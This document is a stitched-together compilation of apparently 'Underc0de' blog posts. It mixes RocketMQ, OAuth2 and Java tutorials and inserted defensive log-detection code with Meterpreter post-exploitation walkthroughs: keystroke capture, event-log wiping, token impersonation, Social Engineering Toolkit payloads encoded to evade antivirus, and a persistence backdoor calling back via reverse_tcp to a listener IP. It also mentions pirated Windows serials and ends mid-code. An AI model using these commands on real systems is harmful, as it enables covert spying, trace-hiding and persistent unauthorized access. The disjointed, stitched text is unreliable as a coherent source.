Method 2 for sending a message: send asynchronously
1) When sending synchronously, the thread that calls send() blocks; when sending asynchronously, the current thread does not block.
2) The send result is delivered through a callback function. The following code is an example of sending a message asynchronously.
3) The difference from sending a message synchronously is that an additional SendCallback object is passed when sending the message.
4) The method returns immediately after it is called, without waiting for the response from the Broker.
5) The corresponding method of the SendCallback object is called back after the message has been sent successfully or has failed. So in the following example, the second message is sent while the first message has not yet been confirmed by the Broker, and the same goes for the third message. The order in which they are successfully sent by the Broker is actually uncertain.
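    import java.util.concurrent.CountDownLatch;
    import org.apache.rocketmq.client.producer.DefaultMQProducer;
    import org.apache.rocketmq.client.producer.SendCallback;
    import org.apache.rocketmq.client.producer.SendResult;
    import org.apache.rocketmq.common.message.Message;
    import org.apache.rocketmq.remoting.common.RemotingHelper;
    import org.junit.Test;

    // Method of a JUnit test class; nameServer is a field holding the NameServer address.
    @Test
    public void sendAsync() throws Exception {
        DefaultMQProducer producer = new DefaultMQProducer("group1");
        producer.setNamesrvAddr(nameServer);
        producer.start();
        // One count per message, so the test waits until every callback has fired.
        CountDownLatch latch = new CountDownLatch(10);
        for (int i = 0; i < 10; i++) {
            Message message = new Message("topic1", ("send by async, no." + i).getBytes(RemotingHelper.DEFAULT_CHARSET));
            // send() returns immediately; the result arrives later in the callback.
            producer.send(message, new SendCallback() {
                @Override
                public void onSuccess(SendResult sendResult) {
                    System.out.println("sent: " + message);
                    latch.countDown();
                }

                @Override
                public void onException(Throwable throwable) {
                    System.out.println("send failed: " + throwable);
                    latch.countDown();
                }
            });
        }
        // Do not shut the producer down before all callbacks have run.
        latch.await();
        producer.shutdown();
    }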
6) If sending an asynchronous message fails, the producer also retries internally. The maximum number of retries is specified with setRetryTimesWhenSendAsyncFailed(), and the default is 2.
Written by UndercOde
ONEWAY - additional information on message sending by Underc0de:
In addition to synchronous sending and asynchronous sending, there is also a sending method called ONEWAY.
> Its sending is one-way, that is, it does not wait for the response from the Broker. It only sends, regardless of whether sending succeeds or fails. It is usually used in scenarios where messages are not so important and can be lost. A message is sent this way by calling sendOneway().
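    // Method of the same JUnit test class; nameServer holds the NameServer address.
    @Test
    public void sendOneway() throws Exception {
        DefaultMQProducer producer = new DefaultMQProducer("group1");
        producer.setNamesrvAddr(nameServer);
        producer.start();
        for (int i = 0; i < 10; i++) {
            Message message = new Message("topic1", "tag2", ("message send with oneway, no." + i).getBytes(RemotingHelper.DEFAULT_CHARSET));
            // Fire and forget: no result and no callback, so a lost message goes unnoticed.
            producer.sendOneway(message);
        }
        producer.shutdown();
    }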
Written by UndercOde
Windows 10 2020 latest serials
Note: If there is a serial activation error (non official server win...), try the official free KMS
Written by UndercOde
Fix problem: Kali-Parrot install error (try again)
Problems when attempting to install Kali Linux 1.0.6 64 Bit ISO: the error is exactly the same every time. Well, let's fix it.
1) Let me mention that the same error occurs on 2 different computers as well, when it comes to "installing the system", and the error pops up 4-5% into the installation process.
2) ... so... after some trial and error with different media (DVD, USB stick, different burning options, USB preps, etc.), I downloaded the Kali Linux 1.0.6 64 Bit Mini ISO to see if I am able to get Kali Linux installed on my stationary computer.
3) Everything seems perfect, the installation alternatives pop up, and the fun begins.
> 1st try: I don't modify the list that appears
result - Failure: installing the system
> 2nd try: I remove the SSH server option
result - Failure: installing the system
> 3rd try: removing the pen-test-pack
result - installation proceeds uninterrupted
...in a logical sense, this points to the pen-test-pack having some kind of bug or something... or?
> Anyway, is there an option to install the pen-test-pack
Well done! Any doubts, feel free to ask
@UndercOdeOfficial
The OAuth2.0 protocol: full tutorial by Underc0de
OAuth2.0 has been a relatively popular authorization mechanism in recent years. Ordinary users may use it every day: most of the third-party logins we often use are based on OAuth2.0. With the interconnection of applications and the invocation of personalized services, open authorization becomes an objective need.
Simple understanding of OAuth2.0
1) OAuth defines the following roles and clearly separates their respective concerns, so that a consistent authorization service can be built quickly:
2) Resource Owner: usually the end user, whose role is to agree to or reject, or even selectively grant, authorization to third-party applications.
3) User Agent: the channel through which the resource owner authorizes, generally a browser or an app.
4) Client: a program that requests authorization and requests access to restricted resources.
5) Authorization Server: a server that verifies a user's authorization and returns an authorization response based on the verification result.
6) Resource Server: a server that can accept and respond to requests for protected resources.
7) Isn't the mere textual description a bit difficult to understand? So here I will illustrate the above four concepts with a personal example. It's the season for programmers to interview again. One year I went to an interview, only to find such a "tall" thing at the place.
A visitor needs a verification code to pass the gate. I contacted the interviewing company's HR. They gave me a link, and after I opened it, a WeChat applet walked through the following process:
1) For example, I sent an interview request to the interviewing company (HR).
2) HR gave me a link where I could request an entry permit.
3) I made a request to enter through the link.
4) The request got a response and returned a verification code to me.
5) I entered the verification code in the gate program.
6) The gate released me after verification.
7) After I studied the OAuth2.0 protocol, I found that this experience reflects some of the design concepts of OAuth2.0.
8) Visitors must be authorized to access the building. In this way, outsiders are prevented from entering and leaving the office, the visitor is controllable (in terms of the time and number of visits), and even access to individual floors can be controlled (of course not in the above example).
9) Mapped onto OAuth2.0: the visitor is the Client, the company (the owner) is the Resource Owner, the property management is the Authorization Server, and the gate is the Resource Server; the gate may also be controlled by the property management.
Written by UndercOde
How to gain access of OAuth access
Based on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care who the owner of the resource is.
2) OAuth2.0 does not provide message signatures. To ensure security, it should not be separated from HTTPS. When other protocols or systems are used, a security mechanism should also be specified to take over the tasks that HTTPS performs.
3) OAuth2.0 does not define an encryption method, although the JOSE specification is currently the one used most.
4) Although the token is held and used by the client, the client cannot parse or process the token.
Written by UndercOde
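The roles from the gate analogy and points 1, 2 and 4 above, as an added example that is not part of the original posts: the authorization server issues an opaque random token, the client only carries it, and the resource server asks the issuer what it permits. All class names, scope strings and result labels are hypothetical, and the lookup is an in-memory stand-in for a real introspection call.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

public class OpaqueTokenDemo {

    enum Decision { ALLOW, INVALID_TOKEN, INSUFFICIENT_SCOPE }

    /** State the authorization server keeps per token. There is no user identity in it. */
    static final class Grant {
        final String clientId;
        final Set<String> scopes;
        final Instant expiresAt;
        int usesLeft;

        Grant(String clientId, Set<String> scopes, Instant expiresAt, int usesLeft) {
            this.clientId = clientId;
            this.scopes = scopes;
            this.expiresAt = expiresAt;
            this.usesLeft = usesLeft;
        }
    }

    /** Authorization Server: "the property management" in the analogy. */
    static final class AuthorizationServer {
        private final SecureRandom random = new SecureRandom();
        private final Map<String, Grant> grants = new ConcurrentHashMap<>();

        /** Called once the Resource Owner has approved the client's request. */
        String issue(String clientId, Set<String> scopes, Duration ttl, int maxUses, Instant now) {
            byte[] raw = new byte[32];
            random.nextBytes(raw);
            // 256 random bits: the token carries no readable claims for the client to parse.
            String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            grants.put(token, new Grant(clientId, scopes, now.plus(ttl), maxUses));
            return token;
        }

        /** Introspection: only the issuer can say what a token stands for. */
        synchronized Decision check(String token, String scope, Instant now) {
            Grant g = grants.get(token);
            if (g == null || now.isAfter(g.expiresAt) || g.usesLeft <= 0) {
                return Decision.INVALID_TOKEN;
            }
            if (!g.scopes.contains(scope)) {
                return Decision.INSUFFICIENT_SCOPE;
            }
            g.usesLeft--; // "number of visits" from the analogy
            return Decision.ALLOW;
        }
    }

    /** Resource Server: "the gate". It never interprets the token itself. */
    static final class ResourceServer {
        private final AuthorizationServer issuer;

        ResourceServer(AuthorizationServer issuer) {
            this.issuer = issuer;
        }

        String handle(String scheme, String authorization, String requiredScope, Instant now) {
            // A bearer token is not signed per request: whoever holds it can use it,
            // so a request that exposed it on plaintext transport is refused.
            if (!"https".equalsIgnoreCase(scheme)) {
                return "REJECTED_PLAINTEXT_TRANSPORT";
            }
            if (authorization == null || !authorization.startsWith("Bearer ")) {
                return Decision.INVALID_TOKEN.name();
            }
            String token = authorization.substring("Bearer ".length());
            return issuer.check(token, requiredScope, now).name();
        }
    }

    public static void main(String[] args) {
        Instant t0 = Instant.parse("2020-01-01T09:00:00Z"); // constructed clock
        AuthorizationServer property = new AuthorizationServer();
        ResourceServer gate = new ResourceServer(property);

        // The visitor (Client) gets a pass for floor 3, valid 30 minutes, 2 entries.
        String token = property.issue("visitor-app", Set.of("floor:3"), Duration.ofMinutes(30), 2, t0);
        String header = "Bearer " + token;
        System.out.println("client holds only: " + token);

        Instant t1 = t0.plusSeconds(60);
        System.out.println("1st entry:      " + gate.handle("https", header, "floor:3", t1));
        System.out.println("other floor:    " + gate.handle("https", header, "floor:9", t1));
        System.out.println("over http:      " + gate.handle("http", header, "floor:3", t1));
        System.out.println("2nd entry:      " + gate.handle("https", header, "floor:3", t1));
        System.out.println("3rd entry:      " + gate.handle("https", header, "floor:3", t1));

        String late = property.issue("visitor-app", Set.of("floor:3"), Duration.ofMinutes(30), 2, t0);
        System.out.println("after expiry:   "
                + gate.handle("https", "Bearer " + late, "floor:3", t0.plus(Duration.ofHours(1))));
    }
}
```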
What are the limitations of Java's anonymous inner classes?
Ubiquitous anonymous inner classes
    button.setOnClickListener(new OnClickListener() {
        @Override public void onClick(View v) { /* handle the click */ }
    });
In the virtual machine, the anonymous inner class does have a name: OuterClass$1
    class RunnableFoo extends Foo implements Runnable {
        @Override public void run() { }
    }
An anonymous inner class cannot be written like this (extending a class and implementing an interface at the same time), but a local class can, and in Kotlin it can be written like this: val runnableFoo = object : Foo(), Runnable {}
The constructor of an anonymous inner class is generated by the compiler; its parameter list includes:
1) The outer object (when the class is defined in a non-static scope)
2) The outer object of the parent class (when the parent class is not static)
3) The constructor parameters of the parent class (when the parent class has a constructor and its parameter list is not empty)
4) Captured outer variables (references to outer final variables in the method body)
Anonymous inner classes are prone to memory leaks
To sum up:
1) No name in the human cognitive sense
2) Can only extend one parent class or implement one interface
3) If the parent class is a non-static type, an outer instance of the parent class may be required to initialize it
4) If it is defined in a non-static scope, it references the outer class instance
5) Can only capture final variables from the outer scope
6) When it implements an interface with a single method, it can be converted to a lambda
Written by UndercOde
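The generated name, the compiler-generated constructor parameters and the leak through the outer reference can all be observed with reflection. This is an added example, not code from the original post; the class, field and method names are hypothetical, and the synthetic field names it prints are javac conventions.

```java
import java.lang.ref.WeakReference;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;

public class AnonymousCaptureDemo {
    // Stands in for a long-lived registry (event bus, static listener list).
    static final List<Runnable> REGISTRY = new ArrayList<>();

    // Large field, so a leaked instance is expensive to keep alive.
    private final byte[] payload = new byte[8 * 1024 * 1024];
    private final String id;

    AnonymousCaptureDemo(String id) {
        this.id = id;
    }

    // Anonymous class in a non-static scope. It reads this.id, so the compiler
    // stores the enclosing instance in a synthetic field and passes it, together
    // with the captured variable, through the generated constructor.
    Runnable anonymousListener(final String prefix) {
        return new Runnable() {
            @Override
            public void run() {
                System.out.println(prefix + id);
            }
        };
    }

    // Lambda in a static scope: it captures only the String, no outer object.
    static Runnable detachedListener(final String text) {
        return () -> System.out.println(text);
    }

    // True if any field of the object is typed as the outer class, i.e. the
    // object keeps an outer instance reachable.
    static boolean holdsOuter(Object o) {
        for (Field f : o.getClass().getDeclaredFields()) {
            if (f.getType() == AnonymousCaptureDemo.class) {
                return true;
            }
        }
        return false;
    }

    // Runtime name, constructor parameter types and fields of the object's class.
    static String describe(Object o) {
        StringBuilder sb = new StringBuilder(o.getClass().getName());
        for (Constructor<?> c : o.getClass().getDeclaredConstructors()) {
            sb.append("\n  constructor parameters:");
            for (Class<?> p : c.getParameterTypes()) {
                sb.append(' ').append(p.getSimpleName());
            }
        }
        for (Field f : o.getClass().getDeclaredFields()) {
            sb.append("\n  field: ").append(f.getType().getSimpleName()).append(' ')
              .append(f.getName()).append(f.isSynthetic() ? " (synthetic)" : "");
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        AnonymousCaptureDemo screen = new AnonymousCaptureDemo("screen-1");
        Runnable anon = screen.anonymousListener("clicked on ");
        Runnable lambda = detachedListener("clicked");

        System.out.println(describe(anon));
        System.out.println("anonymous class holds outer instance: " + holdsOuter(anon));
        System.out.println("lambda holds outer instance: " + holdsOuter(lambda));

        // Leak: the registry outlives the screen, and the listener pins the
        // screen (and its 8 MiB payload) through the synthetic outer reference.
        WeakReference<AnonymousCaptureDemo> ref = new WeakReference<>(screen);
        REGISTRY.add(anon);
        screen = null;
        anon = null;
        System.gc();
        System.out.println("outer still reachable while registered: " + (ref.get() != null));

        // Unregistering breaks the chain; collection is then up to the GC,
        // so this second result is typical rather than guaranteed.
        REGISTRY.clear();
        System.gc();
        System.out.println("outer still reachable after unregistering: " + (ref.get() != null));
    }
}
```

The same pinning keeps any secrets held by the outer object in the heap for as long as the listener stays registered, so unregister listeners or use a static nested class with a weak reference when the outer object is short-lived.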
Controlling Meterpreter (full; Kali, Parrot, Debian, root Termux):
> Meterpreter is a killer tool in the Metasploit framework. It is usually used as the attack payload after a vulnerability has been exploited.
> The attack payload returns a control channel to the user after the vulnerability is triggered.
> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section introduces the use of Meterpreter.
Meterpreter includes some common commands, as shown below:
help: View help information.
background: Allows users to put Meterpreter sessions in the background.
download: Allows users to download files from the compromised host.
upload: Allows users to upload files to the compromised host.
execute: Allows users to execute commands on the compromised host.
shell: Allows users to run Windows shell commands on the compromised host (Windows hosts only).
sessions -i: Allows users to switch sessions.
Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:
1) Start an active session in MSFCONSOLE.
2) Start capturing the keyboard input typed by the user of the system. The execution command is as follows:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
From the output, you can see that keyboard input sniffing is enabled.
3) Capture keyboard input from users of the vulnerable system. The execution command is as follows:
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    <Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
The output information indicates that the user entered www.example..., the enter key, and the exit key in the vulnerable system.
4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
    meterpreter > keyscan_stop
    Stopping the keystroke sniffer...
From the output, you can see that keyboard input sniffing has stopped.
5) Delete a file on the vulnerable system. The execution command is as follows:
    meterpreter > del exploited.docx
6) Clear the event log on the vulnerable system. The execution command is as follows:
    meterpreter > clearev
    [*] Wiping 57 records from Application...
    [*] Wiping 107 records from System...
    [*] Wiping 0 records from Security...
7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.
8) Use kill to kill the process with the specified process number in the vulnerable system. The execution command is as follows:
    meterpreter > kill 2040
    Killing: 2040
9) Attempt to steal an impersonation token from the vulnerable system. The execution command is as follows:
    meterpreter > steal_token
Written by UndercOde
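The defender's view of step 6, as an added example that is not part of the original post: clearing a Windows log leaves its own record, event 1102 in the Security log and event 104 in the System log. The XML below is a constructed, simplified sample in the style of an event export; the class, method and host names are hypothetical.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.TreeMap;
import java.util.TreeSet;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class LogClearDetector {

    // Constructed, simplified records (not captured from a real host).
    static final String SAMPLE = String.join("\n",
        "<Events>",
        event("7036", "System", "2020-01-01T10:14:02Z", ""),
        event("104", "System", "2020-01-01T10:15:30Z",
              "<SubjectUserName>Test</SubjectUserName><Channel>Application</Channel>"),
        event("104", "System", "2020-01-01T10:15:30Z",
              "<SubjectUserName>Test</SubjectUserName><Channel>System</Channel>"),
        event("1102", "Security", "2020-01-01T10:15:31Z",
              "<SubjectUserName>Test</SubjectUserName>"),
        "</Events>");

    // Builds one sample record; userData is the body of the LogFileCleared element.
    static String event(String id, String channel, String time, String userData) {
        String data = userData.isEmpty() ? ""
            : "<UserData><LogFileCleared>" + userData + "</LogFileCleared></UserData>";
        return "<Event><System><EventID>" + id + "</EventID><Channel>" + channel + "</Channel>"
             + "<TimeCreated SystemTime=\"" + time + "\"/>"
             + "<Computer>WS-EXAMPLE-01</Computer></System>" + data + "</Event>";
    }

    static Element first(Element parent, String tag) {
        NodeList nodes = parent.getElementsByTagName(tag);
        return nodes.getLength() == 0 ? null : (Element) nodes.item(0);
    }

    static String text(Element parent, String tag) {
        Element e = first(parent, tag);
        return e == null ? "" : e.getTextContent().trim();
    }

    // Returns one alert per log-clearing record, plus a HIGH alert for every host
    // on which the Application, System and Security logs were all cleared.
    static List<String> findLogClears(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // The export is untrusted input: refuse DOCTYPEs so no external entity is resolved.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document doc = factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));

        List<String> alerts = new ArrayList<>();
        Map<String, Set<String>> clearedPerHost = new TreeMap<>();
        NodeList events = doc.getElementsByTagName("Event");
        for (int i = 0; i < events.getLength(); i++) {
            Element ev = (Element) events.item(i);
            Element sys = first(ev, "System");
            if (sys == null) {
                continue;
            }
            Element data = first(ev, "UserData");
            String id = text(sys, "EventID");
            String channel = text(sys, "Channel");
            String cleared;
            if (id.equals("1102") && channel.equals("Security")) {
                cleared = "Security";          // audit log cleared
            } else if (id.equals("104") && channel.equals("System")) {
                cleared = data == null ? "unknown" : text(data, "Channel"); // another log cleared
            } else {
                continue;                      // unrelated event
            }
            String user = data == null ? "unknown" : text(data, "SubjectUserName");
            String host = text(sys, "Computer");
            Element time = first(sys, "TimeCreated");
            String when = time == null ? "unknown" : time.getAttribute("SystemTime");
            alerts.add(when + " " + host + ": " + cleared + " log cleared by " + user
                    + " (event " + id + ")");
            clearedPerHost.computeIfAbsent(host, h -> new TreeSet<>()).add(cleared);
        }
        for (Map.Entry<String, Set<String>> e : clearedPerHost.entrySet()) {
            if (e.getValue().containsAll(List.of("Application", "Security", "System"))) {
                alerts.add("HIGH " + e.getKey() + ": Application, System and Security logs all cleared");
            }
        }
        return alerts;
    }

    public static void main(String[] args) throws Exception {
        findLogClears(SAMPLE).forEach(System.out::println);
    }
}
```

These records are written to the same host whose logs were just cleared, so the check is only dependable when events are forwarded to a collector the host cannot modify.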
How to obtain a Meterpreter shell using impersonated tokens, by Underc0de:
In order to obtain a Meterpreter shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host was described before in the undercode chat groups and will not be repeated here. The specific steps for using token impersonation are shown below.
1) Start a Meterpreter session. The execution command is as follows:
    msf auxiliary(browser_autopwn) > sessions -i 1
    [*] Starting interaction with 1...
    meterpreter >
From the output, you can see that the Meterpreter session was successfully started.
2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:
    meterpreter > use incognito
    Loading extension incognito...success.
3) From the output you can see that the command for listing the currently valid tokens is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by an ellipsis (...).
List all tokens. The execution command is as follows:
    meterpreter > list_tokens -u
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
    Call rev2self if primary process token is SYSTEM
    Delegation Tokens Available
    ===============================================
    AA-886OKJM26FSW\Test
    Impersonation Tokens Available
    ===============================================
    No tokens available
From the output information, you can see that the valid token allocated is AA-886OKJM26FSW\Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.
4) Use the impersonate_token command to impersonate the Test user for the attack. The execution command is as follows:
    meterpreter > impersonate_token AA-886OKJM26FSW\\Test
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
    Call rev2self if primary process token is SYSTEM
    [+] Delegation token available
    [+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that impersonating the Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.
Written by UndercOde
Note: You need to enter two backslashes (\\) when typing HOSTNAME\USERNAME.
Launching the Social Engineering Toolkit:
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.
𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Start SET. Execute the following command in the terminal:
> root@kali:~# setoolkit
> Or select "Applications" | "Kali Linux" | "Exploit Toolkit" | "Social Engineering Toolkit".
2) Select Social-Engineering Attacks here. Its number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set>
set>
The above information shows the menu options for social engineering attacks, at which point you can choose the type of attack and then attack.
1) Choose to create a payload and listener here by entering the number 4.
2) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2
3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output lists several encoding options for getting the payload past AV detection.
5) Select the fourth type by entering the number 4.
Written by UndercOde
How to Dump Data: Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. Well, let's start!
𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
When a session is successfully established, an attacker can collect data from the target system and use this information as far as possible for further penetration attacks. The specific steps to collect data from the target system are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke sniffer…
3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokes…
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output, you can see that on the target system the Enter key was pressed and the numbers 1, 2, and 34 were entered.
Clear trail
4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log files. To avoid being discovered by the target system, it is very important to clear the trail, because being found can cause a lot of trouble. Users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.
The specific steps to clear the trail using Metasploit are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
2) The irb command in Meterpreter starts a Ruby shell that can be used to clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.
3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')
4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear
5) After executing the above command, the user's trail will be hidden.
Written by UndercOde
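From the defender's side, the clearing described in this post is itself recorded: Windows Vista and later write event 1102 to the Security log and event 104 to the System log when a log is cleared (517 on Windows XP/2003). The following is an added example, not part of the original post, that flags those events in a constructed export and reports hosts where several logs were cleared within a few minutes; the JSON field names and host names are assumptions of this example.

```python
import json
from datetime import datetime, timedelta

# Constructed sample: one JSON object per line, shaped like a flattened
# Windows event export. Host names and field names are assumptions.
SAMPLE_EVENTS = """\
{"host": "WS-EXAMPLE-01", "channel": "Security", "event_id": 4624, "time": "2024-05-07T14:20:03", "user": "Test"}
{"host": "WS-EXAMPLE-01", "channel": "System", "event_id": 104, "time": "2024-05-07T14:31:10", "user": "Test", "cleared": "Application"}
{"host": "WS-EXAMPLE-01", "channel": "System", "event_id": 104, "time": "2024-05-07T14:31:12", "user": "Test", "cleared": "System"}
{"host": "WS-EXAMPLE-01", "channel": "Security", "event_id": 1102, "time": "2024-05-07T14:31:15", "user": "Test"}
{"host": "FS-EXAMPLE-02", "channel": "System", "event_id": 104, "time": "2024-05-07T02:00:00", "user": "backup-svc", "cleared": "Application"}
{"host": "FS-EXAMPLE-02", "channel": "System", "event_id": 7036, "time": "2024-05-07T02:00:05", "user": "SYSTEM"}
not-json line left by a broken forwarder
"""

# (channel, event id) -> name of the cleared log; None means "read it from the event data".
CLEAR_EVENTS = {
    ("Security", 1102): "Security",  # "The audit log was cleared" (Vista and later)
    ("Security", 517): "Security",   # same event on Windows XP / Server 2003
    ("System", 104): None,           # "The ... log file was cleared"
}
REQUIRED_FIELDS = {"host", "channel", "event_id", "time"}


def parse_events(text):
    """Return event dicts, skipping lines that are not usable JSON objects."""
    events = []
    for line in text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict) and REQUIRED_FIELDS.issubset(event):
            event["time"] = datetime.fromisoformat(event["time"])
            events.append(event)
    return events


def find_log_clears(events):
    """Return one record per log-clear event, sorted by host and time."""
    clears = []
    for event in events:
        key = (event["channel"], event["event_id"])
        if key not in CLEAR_EVENTS:
            continue
        clears.append({
            "host": event["host"],
            "time": event["time"],
            "user": event.get("user", "unknown"),
            "cleared": CLEAR_EVENTS[key] or event.get("cleared", "unknown"),
        })
    return sorted(clears, key=lambda c: (c["host"], c["time"]))


def find_clear_bursts(clears, window=timedelta(minutes=5), min_logs=2):
    """Report hosts where at least min_logs distinct logs were cleared within window."""
    by_host = {}
    for clear in clears:
        by_host.setdefault(clear["host"], []).append(clear)
    bursts = []
    for host, items in sorted(by_host.items()):
        items.sort(key=lambda c: c["time"])
        start, best = 0, set()
        for end in range(len(items)):
            # Slide the window start forward until it spans at most `window`.
            while items[end]["time"] - items[start]["time"] > window:
                start += 1
            logs = {c["cleared"] for c in items[start:end + 1]}
            if len(logs) > len(best):
                best = logs
        if len(best) >= min_logs:
            users = sorted({c["user"] for c in items})
            bursts.append({"host": host, "logs": sorted(best), "users": users})
    return bursts


if __name__ == "__main__":
    found = find_log_clears(parse_events(SAMPLE_EVENTS))
    for clear in found:
        print(clear["time"].isoformat(), clear["host"], clear["cleared"], "cleared by", clear["user"])
    for burst in find_clear_bursts(found):
        print("BURST", burst["host"], burst["logs"], burst["users"])
```

These records are written to the log that was just cleared, so they are only dependable when events are forwarded off the host as they are generated.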
How to Create a Persistent Backdoor by Underc0de
1) After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without having to enter the target system again.
2) If the target user breaks the connection, such as restarting the computer, using a backdoor at this time will allow the connection to the target system to be automatically re-established. To facilitate subsequent infiltrations, a backdoor needs to be created. This way, even if the connection is interrupted, it will not affect the work.
Here's how to create a persistent backdoor. The specific steps are shown below.
1) Start a Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >
2) Before creating a persistent backdoor, check its help file.
The above information shows some options for persistent backdoors. Use different options to set up the backdoor.
3) Create a persistent backdoor. The execution command is as follows:
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mERugsIe
5) The output shows the process of creating a backdoor. In the above information, you can see that a persistent script was created in the target system and saved as C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs. The script runs automatically on the target host, at which point a second Meterpreter session is established. As follows:
> meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032)
>Well done!
Written by UndercOde
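The output above names two artifacts a defender can look for: a script dropped in the user's Temp directory and a Run value that points at it. The following added example (not part of the original post) parses `reg query` output for a Run key and flags such values; the sample listing is constructed around the value shown above, and the scoring rules are this example's own assumptions.

```python
import re

# Constructed sample in the layout printed by `reg query <key>`. Only the
# mERugsIe value comes from the output above; the other values are made up.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
    mERugsIe    REG_SZ    C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
    Notes Sync    REG_EXPAND_SZ    %TEMP%\sync.exe
"""

# Value lines are indented: name, registry type, data. Names may contain spaces,
# so the name is matched lazily up to the REG_* type token.
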